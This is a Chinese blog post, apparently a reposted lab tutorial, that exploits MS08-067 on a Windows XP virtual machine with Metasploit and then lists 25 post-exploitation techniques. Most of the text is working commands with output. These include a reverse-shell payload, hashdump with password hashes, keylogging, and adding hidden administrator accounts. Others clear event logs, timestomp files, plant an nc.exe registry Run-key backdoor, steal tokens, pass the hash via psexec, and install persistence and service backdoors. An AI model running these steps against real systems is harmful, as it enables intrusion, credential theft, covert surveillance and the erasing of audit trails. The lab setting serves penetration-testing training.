你好赵伟

这个屌丝很懒，什么也没留下！

热门标签

渗透测试-[Meterpreter后渗透25招]_meterpreter 后渗透

作者：你好赵伟 | 2024-04-20 10:12:16

踩

meterpreter 后渗透

渗透测试-[后渗透25招]

0.实验环境
1.MS08-067漏洞描述【RPC】
2.主机发现
3 利用MSF通过ms08-067漏洞渗透目标系统
4.后渗透利用

本文基于ms08-067为例子，总结记录了常用的后渗透技巧,从简单的信息搜集到后门植入。

0.实验环境

网段：192.168.155.0/24
网卡模式：NAT
攻击机1-Kali-ip：192.168.155.2
攻击机2-mac-ip：192.168.155.1
靶机1winxpSP3英文版-ip：192.168.155.18
靶机2-win7-ip：192.168.155.19

1.MS08-067漏洞描述【RPC】

Microsoft Windows Server服务RPC请求缓冲区溢出漏洞。Windows的Server服务在处理特质RPC请求时存在缓冲区溢出漏洞，远程攻击者可以通过发送恶意的RPC请求触发这个溢出，导致完全入侵用户系统，SYSTEM权限执行任意指令。
对于Windows 2000、XP和Server 2003，无需认证便可以利用该漏洞；对于Windows Vista和Server 2008，可能需要认证。
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067 【官方描述】

2.主机发现

nmap -F 192.168.155.0/24


Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-03 03:50 EDT
Nmap scan report for 192.168.155.1
Host is up (0.00084s latency).
Not shown: 97 closed ports
PORT      STATE SERVICE
53/tcp    open  domain
5000/tcp  open  upnp
49152/tcp open  unknown
MAC Address: FA:FF:C2:C2:93:64 (Unknown)
 
Nmap scan report for 192.168.155.18
Host is up (0.0018s latency).
Not shown: 93 closed ports
PORT     STATE SERVICE
25/tcp   open  smtp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
MAC Address: 00:0C:29:50:ED:13 (VMware)
 
Nmap scan report for 192.168.155.2
Host is up (0.0000060s latency).
All 100 scanned ports on 192.168.155.2 are closed
 
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.23 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

目标主机IP：192.168.155.18
端口开放情况：

PORT     STATE SERVICE
25/tcp   open  smtp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
MAC Address: 00:0C:29:50:ED:13 (VMware)
1
2
3
4
5
6
7
8
9

目标端口：445
服务：microsoft-ds

3 利用MSF通过ms08-067漏洞渗透目标系统

msfconsole
search ms08-067
use msf6 > use exploit/windows/smb/ms08_067_netapi
show targets
set target 0
set RHOSTS 192.168.155.18
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
1
2
3
4
5
6
7
8

exploit
[*] Started reverse TCP handler on 192.168.155.2:4444
[*] 192.168.155.18:445 - Automatically detecting the target...
[*] 192.168.155.18:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.155.18:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.155.18:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.155.18
[*] Meterpreter session 1 opened (192.168.155.2:4444 -> 192.168.155.18:1074) at 2022-05-03 04:42:05 -0400
1
2
3
4
5
6
7
8

4.后渗透利用

4.1.系统信息搜集

信息收集的脚本位于，这里仅展示几个例子。

/usr/share/metasploit-framework/modules/post/windows/gather
/usr/share/metasploit-framework/modules/post/linux/gather
1
2

(1)获取系统基本信息

meterpreter > sysinfo
1

Computer        : DH-CA8822AB9589
OS              : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
1
2
3
4
5
6
7

如果目标是SP2系统，由于微软已不再维护，会存在一大堆漏洞。

(2)判断目标系统是否为虚拟机

meterpreter > run post/windows/gather/checkvm
1

[*] Checking if DH-CA8822AB9589 is a Virtual Machine ...
[+] This is a VMware Virtual Machine
1
2

(3)磁盘分区情况

meterpreter > run post/windows/gather/forensics/enum_drives
1

Device Name:                    Type:   Size (bytes):
------------                    -----   -------------
<Physical Drives:>
\\.\PhysicalDrive0                   4702111234474983745
<Logical Drives:>
\\.\A:                               4702111234474983745
\\.\C:                               4702111234474983745
\\.\D:                               4702111234474983745
1
2
3
4
5
6
7
8

(4)目标软件安装情况

meterpreter > run post/windows/gather/enum_applications 
1

[*] Enumerating applications installed on DH-CA8822AB9589
 
Installed Applications
======================
 
 Name                                    Version
 ----                                    -------
 Adobe Reader 9                          9.0.0
 KingView 6.53                           6.53
 KingView Driver                         6.53
 Microsoft Office Standard Edition 2003  11.0.8173.0
 Sentinel Protection Installer 7.5.0     7.5.0
 VMware Tools                            8.1.4.11056
 WebFldrs XP                             9.50.7523
 

[+] Results stored in: /root/.msf4/loot/20220505234757_default_192.168.155.18_host.application_805792.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

(5)其他信息搜集

run post/windows/gather/dumplinks #获取最近的文件操作

run post/linux/gather/checkvm #是否虚拟机

run post/windows/gather/checkvm #是否虚拟机

run post/windows/gather/enum_ie #获取IE缓存

run post/windows/gather/enum_chrome #获取Chrome缓存

run post/windows/gather/enum_patches #补丁信息

run post/windows/gather/forensics/enum_drives #查看分区

run post/windows/gather/enum_domain #查找域控

run post/windows/gather/enum_applications #获取安装软件信息
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

4.2查看权限

meterpreter > getuid
1

Server username: NT AUTHORITY\SYSTEM
1

可以看到获得了system权限。

4.3 进入目标系统Shell

meterpreter > shell
1


Process 3980 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
 
C:\WINDOWS\system32>

1
2
3
4
5
6
7
8

成功进入目标系统的shell环境。

4.4 添加账号

C:\WINDOWS\system32>net user sxk 123.com /add
1

net user sxk 123.com /add
The command completed successfully.
1
2

4.5 将新账号添加到管理员组中

C:\WINDOWS\system32>net localgroup administrators sxk /add
1

net localgroup administrators sxk /add
The command completed successfully.
1
2

用户已经成功添加到目标系统的管理员组中。
在这里插入图片描述

4.6 截屏

meterpreter > screenshot
1

Screenshot saved to: /root/Desktop/YhioHCHD.jpeg
1

在这里插入图片描述

4.7 文件上传

meterpreter > upload /Users/sxk/MYSHXRuM.jpeg
1

[*] uploading  : /Users/xiaokaisi/MYSHXRuM.jpeg -> MYSHXRuM.jpeg
[*] Uploaded 260.89 KiB of 260.89 KiB (100.0%): /Users/xiaokaisi/MYSHXRuM.jpeg -> MYSHXRuM.jpeg
[*] uploaded   : /Users/xiaokaisi/MYSHXRuM.jpeg -> MYSHXRuM.jpeg
1
2
3

pwd
1

C:\Windows\system32
1

在这里插入图片描述

在目标系统C盘中成功上传文件。

4.8 下载文件

meterpreter > download drivers/etc/hosts
1

[*] Downloading: drivers/etc/hosts -> /Users/xiaokaisi/hosts
[*] Downloaded 854.00 B of 854.00 B (100.0%): drivers/etc/hosts -> /Users/xiaokaisi/hosts
[*] download   : drivers/etc/hosts -> /Users/xiaokaisi/hosts
1
2
3

在这里插入图片描述
成功下载到目标系统的hosts文件。

4.9 获取口令hash

meterpreter > hashdump
1

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
client:1000:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
1
2
3

破解哈希值：
259745cb123a52aa2e693aaacca2db52

在这里插入图片描述
31d6cfe0d16ae931b73c59d7e0c089c0

4.10 摄像头

meterpreter > webcam_list [查看摄像头]
[-] No webcams were found
meterpreter > webcam_snap [通过摄像头拍照]
[-] Target does not have a webcam
meterpreter > webcam_stream [通过摄像头拍摄视频]
[-] Target does not have a webcam
1
2
3
4
5
6

4.11 键盘监听

比如要对目标系统用户Administrator的键盘进行记录的话，就需要把进程迁移到Administrator的进程。在system权限下，是无法捕获Administrator的键盘记录。
keyscan_start开启键盘监听后，用keyscan_dump进行记录的导出，如果不想监听了才keyscan_stop。不是先keyscan_stop再keyscan_dump。

(1) ps找到合适的进程进行迁移

meterpreter>ps
1

3668  3608  explorer.exe 【常用的进程】
1

meterpreter > migrate 3668
1

[*] Migrating from 1048 to 3668...
[*] Migration completed successfully.
1
2

meterpreter > getuid
1

Server username: client-PC\client
1

(2) 键盘监听

meterpreter > keyscan_start
1

Starting the keystroke sniffer ...
1

meterpreter > keyscan_dump
1

Dumping captured keystrokes...
wo shi client ,<Shift>Ilove china<CR>
1
2

meterpreter > keyscan_stop
1

Stopping the keystroke sniffer...
1

成功监听到了目标系统上的用户的键盘输入。“wo shi client ,Ilove china”

4.12 禁用目标系统的键盘或鼠标

uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标
uictl disable keyboard #禁用键盘
uictl disable mouse #禁用鼠标
1
2
3

在这里插入图片描述

4.13 清除日志

清除windows中的应用程序日志、系统日志、安全日志

clearav   
1

在这里插入图片描述

4.14 查找文件

meterpreter > cd C:\\
meterpreter > pwd
1
2

C:\
1

search -f *hosts*
1

在这里插入图片描述

4.15 伪造时间戳

meterpreter > pwd
1

C:\Inetpub\wwwroot
1

meterpreter > ls
1

Listing: C:\Inetpub\wwwroot
===========================
 
Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  342    fil   2001-07-21 14:22:32 +0800  help.gif
100666/rw-rw-rw-  1898   fil   2001-08-10 14:19:20 +0800  iisstart.asp
100666/rw-rw-rw-  8923   fil   2001-08-10 14:19:20 +0800  localstart.asp
100666/rw-rw-rw-  356    fil   2001-07-21 14:22:32 +0800  mmc.gif
100666/rw-rw-rw-  2806   fil   2001-07-21 14:22:32 +0800  pagerror.gif
100666/rw-rw-rw-  1046   fil   2001-07-21 14:22:32 +0800  print.gif
100666/rw-rw-rw-  1577   fil   2001-07-21 14:22:32 +0800  warning.gif
100666/rw-rw-rw-  1182   fil   2001-07-21 14:22:32 +0800  web.gif
100666/rw-rw-rw-  11946  fil   2001-07-21 14:22:32 +0800  winxp.gif
1
2
3
4
5
6
7
8
9
10
11
12
13
14

(1)查看时间戳

meterpreter > timestomp -v help.gif
1

[*] Showing MACE attributes for help.gif
Modified      : 2001-07-21 14:22:32 +0800
Accessed      : 2011-09-28 11:40:15 +0800
Created       : 2011-09-28 11:40:15 +0800
Entry Modified: 2011-09-28 11:40:28 +0800
1
2
3
4
5

meterpreter > timestomp -v iisstart.asp
1

[*] Showing MACE attributes for iisstart.asp
Modified      : 2001-08-10 14:19:20 +0800
Accessed      : 2011-09-28 11:40:15 +0800
Created       : 2011-09-28 11:40:15 +0800
Entry Modified: 2011-09-28 11:40:28 +0800
1
2
3
4
5

(2)将help.gif的时间戳复制给iisstart.asp

可以看到iisstart.asp的时间戳被篡改了。
在这里插入图片描述

4.16 目标系统网络信息搜集

ipconfig/ifconfig [ip信息]

netstat -ano [网络端口信息]

arp[arp信息]

getproxy [查看代理信息]

route [路由信息]
1
2
3
4
5
6
7
8
9

4.17 添加路由到目标主机并进行扫描

在这里插入图片描述

(1)做arp扫描

在这里插入图片描述

(2)做端口扫描

在这里插入图片描述

4.18 mimikatz/kiwi抓取密码

在这里插入图片描述

meterpreter >creds_wdigest
1

[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================
 
Username          Domain           Password
--------          ------           --------
DH-CA8822AB9589$  WORKGROUP        (null)
sxk               DH-CA8822AB9589  123.com
1
2
3
4
5
6
7
8
9

成功获取到用户密码。

meterpreter > kiwi_cmd sekurlsa::logonPasswords
1

在这里插入图片描述

4.19 远程桌面

查看可用的桌面

enumdesktops
1

在这里插入图片描述

获取当前meterpreter 关联的桌面

meterpreter > getdesktop
1

Session 0\S\D
1

(1)开启远程桌面并添加用户

脚本位于

/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb
1

通过enable_rdp.rb脚本可知：开启rdp是通过reg修改注册表；添加用户是调用cmd.exe 通过net user添加；端口转发是利用的portfwd命令

meterpreter > run post/windows/manage/enable_rdp
1

[*] Enabling Remote Desktop
[*]     RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*]     The Terminal Services service is not set to auto, changing it to auto ...
[*]     Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20220506025923_default_192.168.155.18_host.windows.cle_712463.txt
1
2
3
4
5
6

添加用户

run post/windows/manage/enable_rdp USERNAME=lyl PASSWORD=123456
1

[*] Enabling Remote Desktop
[*]     RDP is already enabled
[*] Setting Terminal Services service startup mode
[*]     Terminal Services service is already set to auto
[*]     Opening port in local firewall if necessary
[*] Setting user account for logon
[*]     Adding User: lyl with Password: 123456
[*]     Adding User: lyl to local group 'Remote Desktop Users'
[*]     Hiding user from Windows Login screen
[*]     Adding User: lyl to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20220506030102_default_192.168.155.18_host.windows.cle_669035.txt
1
2
3
4
5
6
7
8
9
10
11
12

设置端口转发

run post/windows/manage/enable_rdp FORWARD=true LPORT=6662
1

[*] Enabling Remote Desktop
[*]     RDP is already enabled
[*] Setting Terminal Services service startup mode
[*]     Terminal Services service is already set to auto
[*]     Opening port in local firewall if necessary
[*] Starting the port forwarding at local port 6662
[*] Local TCP relay created: 0.0.0.0:6662 <-> 127.0.0.1:3389
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20220506030321_default_192.168.155.18_host.windows.cle_270181.txt
1
2
3
4
5
6
7
8

（1）连接RDP远程控制目标主机

rdesktop 127.0.0.1:6662
1

在这里插入图片描述

4.20 抓取目标主机的流量包

meterpreter > use sniffer
1

Loading extension sniffer...Success.
1

meterpreter > sniffer_interfaces
1

1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
1

meterpreter > sniffer_start 1
1

[*] Capture started on interface 1 (50000 packet buffer)
1

meterpreter > sniffer_stats 1
1

[*] Capture statistics for interface 1
        packets: 18
        bytes: 1098
1
2
3

meterpreter > sniffer_dump 1 /tmp/msf-sniffer-test.pcap
1

[*] Flushing packet capture buffer for interface 1...
[*] Flushed 139 packets (12986 bytes)
[*] Downloaded 100% (12986/12986)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/msf-sniffer-test.pcap
1
2
3
4
5

meterpreter > sniffer_stop 1
1

[*] Capture stopped on interface 1
[*] There are 12 packets (732 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
1
2
3

在这里插入图片描述

如图所示为抓到的目标主机的流量包。

4.21 通过操作注册表植入后门

(1) 上传nc

meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
1

[*] uploading  : /usr/share/windows-binaries/nc.exe -> C:\windows\system32
[*] uploaded   : /usr/share/windows-binaries/nc.exe -> C:\windows\system32\nc.exe
1
2

在这里插入图片描述

(2) 枚举run下的key

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
1

Enumerating: HKLM\software\microsoft\windows\currentversion\run
 
  Keys (1):
 
        OptionalComponents
 
  Values (4):
 
        VMware Tools
        VMware User Process
        ICQ Lite
        Adobe Reader Speed Launcher
 
meterpreter >
1
2
3
4
5
6
7
8
9
10
11
12
13
14

(3) 设置键值

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v msf_test_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'
1

Successfully set msf_test_nc of REG_SZ.
1

(4) 查看键值

reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v msf_test_nc
1

Key: HKLM\software\microsoft\windows\currentversion\run
Name: msf_test_nc
Type: REG_SZ
Data: C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe
1
2
3
4

在这里插入图片描述

(5) 访问后门

在这里插入图片描述

成功植入后门。

4.22令牌操纵

(1) 令牌假冒

meterpreter > use incognito 
1

Loading extension incognito...Success.
1

meterpreter > help incognito
1

在这里插入图片描述
查看可用的token

meterpreter > list_tokens -u
1

在这里插入图片描述

假冒DH-CA8822AB9589\sxk token

impersonate_token 'DH-CA8822AB9589\sxk'
1

在这里插入图片描述

使用假冒的token执行cmd

execute -f cmd.exe -i –t
1

在这里插入图片描述

返回重新使用原始token

rev2self
1

meterpreter > getuid
Server username: DH-CA8822AB9589\sxk
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
1
2
3
4
5

(2) 令牌窃取

ps
1

在这里插入图片描述

从指定进程中窃取token

meterpreter > steal_token 1648
1

Stolen token with username: DH-CA8822AB9589\sxk
1

meterpreter > getuid
1

Server username: DH-CA8822AB9589\sxk
1

删除窃取的token

meterpreter > drop_token
1

Relinquished token, now running as: NT AUTHORITY\SYSTEM
1

meterpreter > getuid
1

Server username: NT AUTHORITY\SYSTEM
meterpreter >
1
2

4.23 哈希利用

(1) 获取哈希值

从SAM导出密码哈希（需要system权限）

meterpreter > run post/windows/gather/smart_hashdump
1

在这里插入图片描述

(2)哈希传递

通过smart_hashdump获取用户哈希后，可以利用psexec模块进行哈希传递攻击。
前提条件：①开启445端口 smb服务；②开启admin$共享

在这里插入图片描述

利用过程如下。

msf > use exploit/windows/smb/psexec
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.155.2
msf > set LPORT 4443
msf > set RHOST 192.168.155.18
msf >set SMBUser Administrator
msf >set SMBPass aad3b4*****04ee:5b5f00*****c424c
msf >set SMBDomain  WORKGROUP   #域用户需要设置SMBDomain
msf >exploit
1
2
3
4
5
6
7
8
9

4.24 后门植入

metasploit自带的后门有两种方式启动的，一种是通过启动项启动(persistence)，一种是通过服务启动(metsvc)，另外还可以通过persistence_exe自定义后门文件。

(1) persistence启动项后门

在C:\Users***\AppData\Local\Temp\目录下，上传一个vbs脚本
在注册表HKLM\Software\Microsoft\Windows\CurrentVersion\Run\加入开机启动项
在这里插入图片描述

meterpreter > run persistence -X -i 5 -p 6667 -r 192.168.155.2
1

在这里插入图片描述

连接后门

msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.155.2
msf > set LPORT 6667
msf > exploit
1
2
3
4
5

在这里插入图片描述

(2) metsvc服务后门

在C:\Users***\AppData\Local\Temp\上传了三个文件（metsrv.x86.dll、metsvc-server.exe、metsvc.exe），通过服务启动，服务名为meterpreter

run metsvc -A
1

在这里插入图片描述

连接后门

msf > use exploit/multi/handler
msf > set payload windows/metsvc_bind_tcp
msf > set RHOST 192.168.155.18
msf > set LPORT 31337
msf > exploit
1
2
3
4
5

在这里插入图片描述
成功连接到后门。
到此为止，我们在目标系统植入了三个后门。

25.重启/关机

最后来个简单的。

reboot/shutdown
1

对靶机进行重启关机操作。

声明：本文内容由网友自发贡献，不代表【wpsshop博客】立场，版权归原作者所有，本站不承担相应法律责任。如您发现有侵权的内容，请联系我们。转载请注明出处：https://www.wpsshop.cn/w/你好赵伟/article/detail/456801